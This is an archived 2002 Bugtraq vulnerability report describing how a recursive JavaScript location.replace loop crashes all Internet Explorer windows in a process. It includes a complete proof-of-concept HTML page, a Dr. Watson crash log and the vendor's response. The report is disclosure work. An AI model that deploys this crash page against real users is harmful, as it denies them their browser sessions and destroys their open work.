Home page logo
/

bugtraq logo Bugtraq mailing list archives

Javascript loop causes IE to crash
From: Patrik Birgersson <patrik.birgersson () aiasec com>
Date: Mon, 18 Mar 2002 19:36:46 +0100 (CET)

== VULNERABILITY REPORT ==

Author:     Patrik Birgersson
Object:     Microsoft Internet Explorer
Remote:     Yes
Local:      Yes


Confirmed vulnerable configurations:
IE 6    + Windows XP Professional
IE 6    + Windows 2000 Professional SP2
IE 5.5  + Windows 2000 Professional SP2 + Pre SP3 patches
IE 5.01 + Windows 2000 Professional SP2 + Pre SP3 patches
IE 5.01 + Windows NT 4 Workstation SP4

Probably other configurations are vulnerable too.


-= SYNOPSIS =-

IE contains a flaw in its JavaScript handling that makes it possible to
crash all IE windows running in the same process.

The impact is not very heavy, but more of a principal nature, since I
believe that a web page: 1) shouldn't be able to crash the browser and
2) even if closing "it's own" window(s), shouldn't be able to affect other
browser windows.


-= DETAILS =-

If IE encounters a web page running a JavaScript that is using
location.replace and then calls itself, thus causing a loop, IE will crash
and close all IE windows running in the same process.

Here's the example code:

<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
  var url = document.location
  if (document.images) {
    location.replace(url);
  } else {
    location.href = url;
  }
  crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>

If this code is sent to the browser for execution, either served from a
web server or opened as a local file, IE will crash.

On WinXP and WinNT4 IE dies quietly and does not leave any trace of the
incident, neither in Event Log or Dr. Watson.

On Win2k however, Dr. Watson is invoked and recording the crash as a stack
overflow. Below is a snippet from a Dr. Watson log created from this
incident (wrapping may occur).

Application exception occurred:
        App: iexplore.exe (pid=808)
        When: 2/3/2002 @ 17:20:31.934
        Exception number: c00000fd (stack overflow)

<- snip ->

State Dump for Thread Id 0x294

eax=000332a8 ebx=00000000 ecx=0000009a edx=00033288 esi=0000021a
edi=0000020a eip=77fcb12d esp=00033000 ebp=00033014 iopl=0 nv up ei pl nz
na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202


function: RtlAllocateHeap
        77fcb10f 55               push    ebp
        77fcb110 8bec             mov     ebp,esp
        77fcb112 6aff             push    0xff
        77fcb114 688026f877       push    0x77f82680
        77fcb119 68a79dfb77       push    0x77fb9da7
        77fcb11e 64a100000000     mov     eax,fs:[00000000]         fs:00000000=????????
        77fcb124 50               push    eax
        77fcb125 64892500000000   mov     fs:[00000000],esp         fs:00000000=????????
        77fcb12c 51               push    ecx
FAULT ->77fcb12d 51               push    ecx
        77fcb12e 81ec74010000     sub     esp,0x174
        77fcb134 53               push    ebx
        77fcb135 56               push    esi
        77fcb136 57               push    edi
        77fcb137 8b7d08           mov     edi,[ebp+0x8]             ss:00b105e6=????????
        77fcb13a 897da4           mov     [ebp+0xa4],edi            ss:00b105e6=????????
        77fcb13d 8065b800         and     byte ptr [ebp+0xb8],0x0   ss:00b105e6=??
        77fcb141 8b450c           mov     eax,[ebp+0xc]             ss:00b105e6=????????
        77fcb144 0b4710           or      eax,[edi+0x10]            ds:00add7dc=????????
        77fcb147 89450c           mov     [ebp+0xc],eax             ss:00b105e6=????????
        77fcb14a a9600f037d       test    eax,0x7d030f60


<- snip ->

However, what I have been able to conclude, this stack overflow is not
exploitable.



-= VENDOR INFORMATION =-

Microsoft was informed about this issue on Feb 8 2002.
After some mail exchaning between Microsoft Security Response Center and
I, Microsoft finally stated this:

In terms of the definition of a security vulnerability which we discuss
at
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/colum
ns/security/vulnrbl.asp crashing a browser would not be regarded as a
security vulnerability.


-= CREDITS =-

* Marcus Hufvudsson for additional investigation about this issue.
* All of you that believes in full disclosure.



  By Date           By Thread  

Current thread:
  • Javascript loop causes IE to crash Patrik Birgersson (Mar 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault